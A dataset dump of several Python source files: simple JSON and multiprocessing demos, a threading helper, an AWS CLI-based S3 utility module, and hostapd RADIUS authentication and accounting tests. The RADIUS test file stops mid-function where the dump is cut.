source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
Json.py
|
# import json
# d = dict(name='Bob', age=20, score=88)
# jstr=json.dumps(d)
# print(jstr)
# d1=json.loads(jstr)
# print(d1)
import json
class Student(object):
def __init__(self, name, age, score):
self.name = name
self.age = age
self.score = score
s = Student('Bob', 20, 88)
print(json.dumps(s, default=lambda obj: obj.__dict__))
from multiprocessing import Process
import os
# 子进程要执行的代码
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',))
print('Child process will start.')
p.start()
p.join()
print('Child process end.')
|
threads.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import threading
from six.moves import queue
def execute_function_multithreaded(fn,
args_list,
block_until_all_done=True,
max_concurrent_executions=1000):
"""
Executes fn in multiple threads each with one set of the args in the
args_list.
:param fn: function to be executed
:type fn:
:param args_list:
:type args_list: list(list)
:param block_until_all_done: if is True, function will block until all the
threads are done and will return the results of each thread's execution.
:type block_until_all_done: bool
:param max_concurrent_executions:
:type max_concurrent_executions: int
:return:
If block_until_all_done is False, returns None. If block_until_all_done is
True, function returns the dict of results.
{
index: execution result of fn with args_list[index]
}
:rtype: dict
"""
result_queue = queue.Queue()
worker_queue = queue.Queue()
for i, arg in enumerate(args_list):
arg.append(i)
worker_queue.put(arg)
def fn_execute():
while True:
try:
arg = worker_queue.get(block=False)
except queue.Empty:
return
exec_index = arg[-1]
res = fn(*arg[:-1])
result_queue.put((exec_index, res))
threads = []
number_of_threads = min(max_concurrent_executions, len(args_list))
for _ in range(number_of_threads):
thread = in_thread(target=fn_execute, daemon=not block_until_all_done)
threads.append(thread)
# Returns the results only if block_until_all_done is set.
results = None
if block_until_all_done:
# Because join() cannot be interrupted by signal, a single join()
# needs to be separated into join()s with timeout in a while loop.
have_alive_child = True
while have_alive_child:
have_alive_child = False
for t in threads:
t.join(0.1)
if t.is_alive():
have_alive_child = True
results = {}
while not result_queue.empty():
item = result_queue.get()
results[item[0]] = item[1]
if len(results) != len(args_list):
raise RuntimeError(
'Some threads for func {func} did not complete '
'successfully.'.format(func=fn.__name__))
return results
def in_thread(target, args=(), name=None, daemon=True, silent=False):
"""
Executes the given function in background.
:param target: function
:param args: function arguments
:param name: name of the thread
:param daemon: run as daemon thread, do not block until thread is doe
:param silent: swallows exceptions raised by target silently
:return background thread
"""
if not isinstance(args, tuple):
raise ValueError('args must be a tuple, not {}, for a single argument use (arg,)'
.format(type(args)))
if silent:
def fn(*args):
try:
target(*args)
except:
pass
else:
fn = target
bg = threading.Thread(target=fn, args=args, name=name)
bg.daemon = daemon
bg.start()
return bg
def on_event(event, func, args=(), stop=None, check_interval_seconds=1.0, silent=False):
"""
Executes the given function in a separate thread when event is set.
That threat can be stopped by setting the optional stop event.
The stop event is check regularly every check_interval_seconds.
Exceptions will silently be swallowed when silent is True.
:param event: event that triggers func
:type event: threading.Event
:param func: function to trigger
:param args: function arguments
:param stop: event to stop thread
:type stop: threading.Event
:param check_interval_seconds: interval in seconds to check the stop event
:type check_interval_seconds: float
:param silent: swallows exceptions raised by target silently
:return: thread
"""
if not isinstance(args, tuple):
raise ValueError('args must be a tuple, not {}, for a single argument use (arg,)'
.format(type(args)))
if stop is None:
def fn():
event.wait()
func(*args)
else:
def fn():
while not event.is_set() and not stop.is_set():
event.wait(timeout=check_interval_seconds)
if not stop.is_set():
func(*args)
return in_thread(fn, silent=silent)
|
spawning_processes_sk.py
|
#Spawn a Process – Chapter 3: Process Based Parallelism
import multiprocessing
def CustomFunction(i):
print ('Menjalankan fungsi dengan process no : %s' %i)
for j in range (0,i):
print('Hasil looping fungsi dengan no : %s' %j)
return
if __name__ == '__main__':
for i in range(6):
process = multiprocessing.Process(target=CustomFunction, args=(i,))
process.start()
process.join()
|
s3.py
|
import json
import errno
import os
import tempfile
import sys
import subprocess
import time
import re
from collections import defaultdict
from urllib.parse import urlparse
#
# This creates an S3 file that supports seeking and caching.
# We keep this file at Python2.7 for legacy reasons
global debug
_LastModified = 'LastModified'
_ETag = 'ETag'
_StorageClass = 'StorageClass'
_Key = 'Key'
_Size = 'Size'
_Prefix = 'Prefix'
READ_CACHE_SIZE = 4096 # big enough for front and back caches
MAX_READ = 65536 * 16
debug = False
READTHROUGH_CACHE_DIR = '/mnt/tmp/s3cache'
AWS_CLI_LIST = ['/usr/bin/aws', '/usr/local/bin/aws', '/usr/local/aws/bin/aws']
AWS_CLI = None
def awscli():
global AWS_CLI
if AWS_CLI is None:
for path in AWS_CLI_LIST:
if os.path.exists(path):
AWS_CLI = path
return AWS_CLI
raise RuntimeError("Cannot find aws executable in "+str(AWS_CLI_LIST))
return AWS_CLI
def get_bucket_key(loc):
"""Given a location, return the (bucket,key)"""
p = urlparse(loc)
if p.scheme == 's3':
return p.netloc, p.path[1:]
if p.scheme == '':
if p.path.startswith("/"):
(ignore, bucket, key) = p.path.split('/', 2)
else:
(bucket, key) = p.path.split('/', 1)
return bucket, key
assert ValueError("{} is not an s3 location".format(loc))
def aws_s3api(cmd, debug=False):
aws = awscli()
fcmd = [aws, 's3api', '--output=json'] + cmd
if debug:
sys.stderr.write(" ".join(fcmd))
sys.stderr.write("\n")
try:
p = subprocess.Popen(fcmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(out,err) = p.communicate()
if p.returncode==0:
if out==b'':
return out
try:
return json.loads(out.decode('utf-8'))
except json.decoder.JSONDecodeError as e:
print(e,file=sys.stderr)
print("out=",out,file=sys.stderr)
raise e
else:
err = err.decode('utf-8')
if 'does not exist' in err:
raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), str(cmd))
else:
raise RuntimeError("aws_s3api. cmd={} out={} err={}".format(cmd,out,err))
except TypeError as e:
raise RuntimeError("s3 api {} failed data: {}".format(cmd, e))
if not data:
return None
try:
return json.loads(data)
except (TypeError, json.decoder.JSONDecodeError) as e:
raise RuntimeError("s3 api {} failed data: {}".format(cmd, data))
def put_object(bucket, key, fname):
"""Given a bucket and a key, upload a file"""
assert os.path.exists(fname)
return aws_s3api(['put-object', '--bucket', bucket, '--key', key, '--body', fname])
def put_s3url(s3url, fname):
"""Upload a file to a given s3 URL"""
(bucket, key) = get_bucket_key(s3url)
return put_object(bucket, key, fname)
def get_object(bucket, key, fname):
"""Given a bucket and a key, download a file"""
if os.path.exists(fname):
raise FileExistsError(fname)
return aws_s3api(['get-object', '--bucket', bucket, '--key', key, fname])
def head_object(bucket, key):
"""Wrap the head-object api"""
return aws_s3api(['head-object', '--bucket', bucket, '--key', key])
def delete_object(bucket, key):
"""Wrap the delete-object api"""
return aws_s3api(['delete-object', '--bucket', bucket, '--key', key])
def delete_s3url(s3url):
(bucket, key) = get_bucket_key(s3url)
return delete_object( bucket, key )
PAGE_SIZE = 1000
MAX_ITEMS = 1000
def list_objects(bucket, prefix=None, limit=None, delimiter=None):
"""Returns a generator that lists objects in a bucket. Returns a list of dictionaries, including Size and ETag"""
# handle the case where an S3 URL is provided instead of a bucket and prefix
if bucket.startswith('s3://') and (prefix is None):
(bucket, prefix) = get_bucket_key(bucket)
next_token = None
total = 0
while True:
cmd = ['list-objects-v2', '--bucket', bucket, '--prefix', prefix,
'--page-size', str(PAGE_SIZE), '--max-items', str(MAX_ITEMS)]
if delimiter:
cmd += ['--delimiter', delimiter]
if next_token:
cmd += ['--starting-token', next_token]
res = aws_s3api(cmd)
if not res:
return
if 'Contents' in res:
for data in res['Contents']:
yield data
total += 1
if limit and total >= limit:
return
if 'NextToken' not in res:
return # no more!
next_token = res['NextToken']
elif 'CommonPrefixes' in res:
for data in res['CommonPrefixes']:
yield data
return
else:
return
def search_objects(bucket, prefix=None, *, name, delimiter='/', limit=None, searchFoundPrefixes=True, threads=20):
"""Search for occurences of a name. Returns a list of all found keys as dictionaries.
@param bucket - the bucket to search
@param prefix - the prefix to start with
@param name - the name being searched for
@param delimiter - the delimiter that separates names
@param limit - the maximum number of names keys to return
@param searchFoundPrefixes - If true, do not search for prefixes below where name is found.
@param threads - the number of Python threds to use. Note that this is all in the same process.
"""
import queue, threading
if limit is None:
limit = sys.maxsize # should be big enough
ret = []
def worker():
while True:
prefix = q.get()
if prefix is None:
break
found_prefixes = []
found_names = 0
for obj in list_objects(bucket, prefix=prefix, delimiter=delimiter):
if _Prefix in obj:
found_prefixes.append(obj[_Prefix])
if (_Key in obj) and obj[_Key].split(delimiter)[-1] == name:
if len(ret) < limit:
ret.append(obj)
if len(ret) > limit:
break
if found_names == 0 or searchFoundPrefixes:
if len(ret) < limit:
for lp in found_prefixes:
q.put(lp)
q.task_done()
q = queue.Queue()
thread_pool = []
for i in range(threads):
t = threading.Thread(target=worker)
t.start()
thread_pool.append(t)
q.put(prefix)
# block until all tasks are done
q.join()
# stop workers
for i in range(threads):
q.put(None)
for t in thread_pool:
t.join()
return ret
def etag(obj):
"""Return the ETag of an object. It is a known bug that the S3 API returns ETags wrapped in quotes
see https://github.com/aws/aws-sdk-net/issue/815"""
etag = obj['ETag']
if etag[0] == '"':
return etag[1:-1]
return etag
def object_sizes(sobjs):
"""Return an array of the object sizes"""
return [obj['Size'] for obj in sobjs]
def sum_object_sizes(sobjs):
"""Return the sum of all the object sizes"""
return sum(object_sizes(sobjs))
def any_object_too_small(sobjs):
"""Return if any of the objects in sobjs is too small"""
MIN_MULTIPART_COMBINE_OBJECT_SIZE = 0
return any([size < MIN_MULTIPART_COMBINE_OBJECT_SIZE for size in object_sizes(sobjs)])
def download_object(tempdir, bucket, obj):
"""Given a dictionary that defines an object, download it, and set the fname property to be where it was downloaded"""
if 'fname' not in obj:
obj['fname'] = tempdir + "/" + os.path.basename(obj['Key'])
get_object(bucket, obj['Key'], obj['fname'])
def concat_downloaded_objects(obj1, obj2):
"""Concatenate two downloaded files, delete the second"""
# Make sure both objects exist
assert os.path.exists(obj1['fname'])
assert os.path.exists(obj2['fname'])
# Concatenate with cat (it's faster than doing it in Python)
subprocess.run(['cat', obj2['fname']], stdout=open(obj1['fname'], 'ab'))
# Update obj1
obj1['Size'] += obj2['Size']
if 'ETag' in obj1: # if it had an eTag
del obj1['ETag'] # it is no longer valid
os.unlink(obj2['fname']) # remove the second file
return
class S3File:
"""Open an S3 file that can be seeked. This is done by caching to the local file system."""
def __init__(self, name, mode='rb'):
self.name = name
self.url = urlparse(name)
if self.url.scheme != 's3':
raise RuntimeError("url scheme is {}; expecting s3".format(self.url.scheme))
self.bucket = self.url.netloc
self.key = self.url.path[1:]
self.fpos = 0
self.tf = tempfile.NamedTemporaryFile()
cmd = [awscli(), 's3api', 'list-objects', '--bucket', self.bucket, '--prefix', self.key, '--output', 'json']
data = json.loads(subprocess.Popen(cmd, encoding='utf8', stdout=subprocess.PIPE).communicate()[0])
file_info = data['Contents'][0]
self.length = file_info['Size']
self.ETag = file_info['ETag']
# Load the caches
self.frontcache = self._readrange(0, READ_CACHE_SIZE) # read the first 1024 bytes and get length of the file
if self.length > READ_CACHE_SIZE:
self.backcache_start = self.length - READ_CACHE_SIZE
if debug:
print("backcache starts at {}".format(self.backcache_start))
self.backcache = self._readrange(self.backcache_start, READ_CACHE_SIZE)
else:
self.backcache = None
def _readrange(self, start, length):
# This is gross; we copy everything to the named temporary file, rather than a pipe
# because the pipes weren't showing up in /dev/fd/?
# We probably want to cache also... That's coming
cmd = [awscli(), 's3api', 'get-object', '--bucket', self.bucket, '--key', self.key, '--output', 'json',
'--range', 'bytes={}-{}'.format(start, start + length - 1), self.tf.name]
if debug:
print(cmd)
data = json.loads(subprocess.Popen(cmd, encoding='utf8', stdout=subprocess.PIPE).communicate()[0])
if debug:
print(data)
self.tf.seek(0) # go to the beginning of the data just read
return self.tf.read(length) # and read that much
def __repr__(self):
return "FakeFile<name:{} url:{}>".format(self.name, self.url)
def read(self, length=-1):
# If length==-1, figure out the max we can read to the end of the file
if length == -1:
length = min(MAX_READ, self.length - self.fpos + 1)
if debug:
print("read: fpos={} length={}".format(self.fpos, length))
# Can we satisfy from the front cache?
if self.fpos < READ_CACHE_SIZE and self.fpos + length < READ_CACHE_SIZE:
if debug:
print("front cache")
buf = self.frontcache[self.fpos:self.fpos + length]
self.fpos += len(buf)
if debug:
print("return 1: buf=", buf)
return buf
# Can we satisfy from the back cache?
if self.backcache and (self.length - READ_CACHE_SIZE < self.fpos):
if debug:
print("back cache")
buf = self.backcache[self.fpos - self.backcache_start:self.fpos - self.backcache_start + length]
self.fpos += len(buf)
if debug:
print("return 2: buf=", buf)
return buf
buf = self._readrange(self.fpos, length)
self.fpos += len(buf)
if debug:
print("return 3: buf=", buf)
return buf
def seek(self, offset, whence=0):
if debug:
print("seek({},{})".format(offset, whence))
if whence == 0:
self.fpos = offset
elif whence == 1:
self.fpos += offset
elif whence == 2:
self.fpos = self.length + offset
else:
raise RuntimeError("whence={}".format(whence))
if debug:
print(" ={} (self.length={})".format(self.fpos, self.length))
def tell(self):
return self.fpos
def write(self):
raise RuntimeError("Write not supported")
def flush(self):
raise RuntimeError("Flush not supported")
def close(self):
return
#
# S3 Cache
#
# Tools for reading and write files from Amazon S3 without boto or boto3
# http://boto.cloudhackers.com/en/latest/s3_tut.html
# but it is easier to use the AWS cli, since it's configured to work.
#
# This could be redesigned to simply use the S3File() below
# Todo: redesign so that it can be used in a "with" statement
class s3open:
def __init__(self, path, mode="r", encoding=sys.getdefaultencoding(), cache=False, fsync=False):
"""
Open an s3 file for reading or writing. Can handle any size, but cannot seek.
We could use boto.
http://boto.cloudhackers.com/en/latest/s3_tut.html
but it is easier to use the aws cli, since it is present and more likely to work.
@param fsync - if True and mode is writing, use object-exists to wait for the object to be created.
"""
if not path.startswith("s3://"):
raise ValueError("Invalid path: " + path)
if "b" in mode:
encoding = None
self.path = path
self.mode = mode
self.encoding = encoding
self.cache = cache
self.fsync = fsync
cache_name = os.path.join(READTHROUGH_CACHE_DIR, path.replace("/", "_"))
# If not caching and a cache file is present, delete it.
if not cache and os.path.exists(cache_name):
os.unlink(cache_name)
if cache and ('w' not in mode):
os.makedirs(READTHROUGH_CACHE_DIR, exist_ok=True)
if os.path.exists(cache_name):
self.file_obj = open(cache_name, mode=mode, encoding=encoding)
assert 'a' not in mode
assert '+' not in mode
if "r" in mode:
if cache:
subprocess.check_call([awscli(), 's3', 'cp', '--quiet', path, cache_name])
open(cache_name, mode=mode, encoding=encoding)
self.p = subprocess.Popen([awscli(), 's3', 'cp', '--quiet', path, '-'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding=encoding)
self.file_obj = self.p.stdout
elif "w" in mode:
self.p = subprocess.Popen([awscli(), 's3', 'cp', '--quiet', '-', path],
stdin=subprocess.PIPE, encoding=encoding)
self.file_obj = self.p.stdin
else:
raise RuntimeError("invalid mode:{}".format(mode))
def __enter__(self):
return self.file_obj
def __exit__(self, exception_type, exception_value, traceback):
self.file_obj.close()
if self.p.wait() != 0:
raise RuntimeError(self.p.stderr.read())
self.waitObjectExists()
def waitObjectExists(self):
if self.fsync and "w" in self.mode:
(bucket, key) = get_bucket_key(self.path)
aws_s3api(['wait', 'object-exists', '--bucket', bucket, '--key', key])
# The following 4 methods are only needed for direct use of s3open as object, outside with-statement, rather than as a context manager
def __iter__(self):
return self.file_obj.__iter__()
def read(self, *args, **kwargs):
return self.file_obj.read(*args, **kwargs)
def write(self, *args, **kwargs):
return self.file_obj.write(*args, **kwargs)
def close(self):
self.waitObjectExists()
return self.file_obj.close()
def s3exists(path):
"""Return True if the S3 file exists. Should be replaced with an s3api function"""
out = subprocess.Popen([awscli(), 's3', 'ls', '--page-size', '10', path],
stdout=subprocess.PIPE, encoding='utf-8').communicate()[0]
return len(out) > 0
def s3rm(path):
"""Remove an S3 object"""
(bucket, key) = get_bucket_key(path)
res = aws_s3api(['delete-object', '--bucket', bucket, '--key', key])
print("res:",type(res))
if res['DeleteMarker'] != True:
raise RuntimeError("Unknown response from delete-object: {}".format(res))
class DuCounter:
def __init__(self):
self.total_bytes = 0
self.total_files = 0
def count(self, bytes_):
self.total_bytes += bytes_
self.total_files += 1
def print_du(root):
"""Print a DU output using aws cli to generate the usage"""
prefixes = defaultdict(DuCounter)
cmd = [awscli(),'s3','ls','--recursive',root]
print(" ".join(cmd))
p = subprocess.Popen(cmd,stdout=subprocess.PIPE, encoding='utf-8')
part_re = re.compile(f"(\d\d\d\d-\d\d-\d\d) (\d\d:\d\d:\d\d)\s+(\d+) (.*)")
total_bytes = 0
MiB = 1024*1024
try:
for (ct,line) in enumerate(p.stdout):
parts = part_re.search(line)
if parts is None:
print("Cannot parse: ",line,file=sys.stderr,flush=True)
continue
bytes_ = int(parts.group(3))
path = parts.group(4)
total_bytes += bytes_
prefixes[ os.path.dirname(path) ].count(bytes_)
if ct%1000==0:
print(f"files: {ct} MiB: {int(total_bytes/MiB):,} {parts.group(4)}",flush=True)
except KeyboardInterrupt as e:
print("*** interrupted ***")
print(f"Total lines: {ct} MiB: {int(total_bytes/MiB):,},")
fmt1 = "{:>10}{:>20} {}"
fmt2 = "{:>10}{:>20,} {}"
print()
print("Usage by prefix:")
print(fmt1.format('files','bytes','path'))
for path in sorted(prefixes):
print(fmt2.format(prefixes[path].total_files,
prefixes[path].total_bytes,
path))
print("")
print("Top 20 by size:")
print(fmt1.format('files','bytes','path'))
for (ct,path) in enumerate(sorted(prefixes, key=lambda path:prefixes[path].total_bytes, reverse=True),1):
print(fmt2.format(prefixes[path].total_files,
prefixes[path].total_bytes,
path))
if ct==20:
break
if __name__ == "__main__":
t0 = time.time()
count = 0
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter,
description="Combine multiple files on Amazon S3 to the same file.")
parser.add_argument("--ls", action='store_true', help="list a s3 prefix")
parser.add_argument("--du", action='store_true', help='List usage under an s3 prefix')
parser.add_argument("--delimiter", help="specify a delimiter for ls")
parser.add_argument("--debug", action='store_true')
parser.add_argument("--search", help="Search for something")
parser.add_argument("--threads", help="For searching, the number of threads to use", type=int, default=20)
parser.add_argument("roots", nargs="+")
args = parser.parse_args()
if args.debug:
debug = args.debug
for root in args.roots:
(bucket, prefix) = get_bucket_key(root)
if args.ls:
for data in list_objects(bucket, prefix, delimiter=args.delimiter):
print("{:18,} {}".format(data[_Size], data[_Key]))
count += 1
if args.search:
for data in search_objects(bucket, prefix, name=args.search, searchFoundPrefixes=False, threads=args.threads):
print("{:18,} {}".format(data[_Size], data[_Key]))
count += 1
if args.du:
print_du(root)
t1 = time.time()
if args.ls or args.search:
print("Total files: {}".format(count), file=sys.stderr)
print("Elapsed time: {}".format(t1 - t0), file=sys.stderr)
|
test_radius.py
|
# RADIUS tests
# Copyright (c) 2013-2016, Jouni Malinen <[email protected]>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
from remotehost import remote_compatible
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import subprocess
import threading
import time
import hostapd
from utils import *
from test_ap_hs20 import build_dhcp_ack
from test_ap_ft import ft_params1
def connect(dev, ssid, wait_connect=True):
dev.connect(ssid, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="[email protected]",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=wait_connect)
@remote_compatible
def test_radius_auth_unreachable(dev, apdev):
"""RADIUS Authentication server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAuthClientAccessRetransmissions"]) < 1:
raise Exception("Missing RADIUS Authentication retransmission")
if int(mib["radiusAuthClientPendingRequests"]) < 1:
raise Exception("Missing pending RADIUS Authentication request")
def test_radius_auth_unreachable2(dev, apdev):
"""RADIUS Authentication server unreachable (2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.17"
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
logger.info("radiusAuthClientAccessRetransmissions: " + mib["radiusAuthClientAccessRetransmissions"])
def test_radius_auth_unreachable3(dev, apdev):
"""RADIUS Authentication server initially unreachable, but then available"""
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.18"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('auth_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
def test_radius_acct_unreachable(dev, apdev):
"""RADIUS Accounting server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 2:
raise Exception("Missing RADIUS Accounting retransmissions")
if int(mib["radiusAccClientPendingRequests"]) < 2:
raise Exception("Missing pending RADIUS Accounting requests")
def test_radius_acct_unreachable2(dev, apdev):
"""RADIUS Accounting server unreachable(2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
found = False
for i in range(4):
time.sleep(1)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) > 0 or \
int(mib["radiusAccClientPendingRequests"]) > 0:
found = True
if not found:
raise Exception("Missing pending or retransmitted RADIUS Accounting requests")
def test_radius_acct_unreachable3(dev, apdev):
"""RADIUS Accounting server initially unreachable, but then available"""
require_under_vm()
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.18"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('acct_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
time.sleep(1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalResponses'])
req_e = int(as_mib_end['radiusAccServTotalResponses'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_unreachable4(dev, apdev):
"""RADIUS Accounting server unreachable and multiple STAs"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
for i in range(20):
connect(dev[0], "radius-acct")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_radius_acct(dev, apdev):
"""RADIUS Accounting"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_auth_req_attr'] = ["126:s:Operator", "77:s:testing",
"62:d:1"]
params['radius_acct_req_attr'] = ["126:s:Operator", "62:d:1",
"77:s:testing"]
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
dev[2].connect("radius-acct", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
logger.info("Checking for RADIUS counters")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 3:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_req_attr(dev, apdev, params):
"""RADIUS request attributes"""
try:
import sqlite3
except ImportError:
raise HwsimSkip("No sqlite3 module available")
db = os.path.join(params['logdir'], "radius_req_attr.sqlite")
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_eap_params(ssid="radius-req-attr")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_auth_req_attr'] = ["126:s:Operator"]
params['radius_acct_req_attr'] = ["126:s:Operator"]
params['radius_req_attr_sqlite'] = db
hapd = hostapd.add_ap(apdev[0], params)
with sqlite3.connect(db) as conn:
sql = "INSERT INTO radius_attributes(sta,reqtype,attr) VALUES (?,?,?)"
for e in [(dev[0].own_addr(), "auth", "77:s:conn-info-0"),
(dev[1].own_addr(), "auth", "77:s:conn-info-1"),
(dev[1].own_addr(), "auth", "77:s:conn-info-1a"),
(dev[1].own_addr(), "acct", "77:s:conn-info-1b")]:
conn.execute(sql, e)
conn.commit()
connect(dev[0], "radius-req-attr")
connect(dev[1], "radius-req-attr")
connect(dev[2], "radius-req-attr")
def test_radius_acct_non_ascii_ssid(dev, apdev):
"""RADIUS Accounting and non-ASCII SSID"""
params = hostapd.wpa2_eap_params()
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
ssid2 = "740665007374"
params['ssid2'] = ssid2
hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid2=ssid2, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="[email protected]",
password_hex="0123456789abcdef0123456789abcdef")
def test_radius_acct_pmksa_caching(dev, apdev):
"""RADIUS Accounting with PMKSA caching"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
for d in [dev[0], dev[1]]:
d.request("REASSOCIATE")
d.wait_connected(timeout=15, error="Reassociation timed out")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 4:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
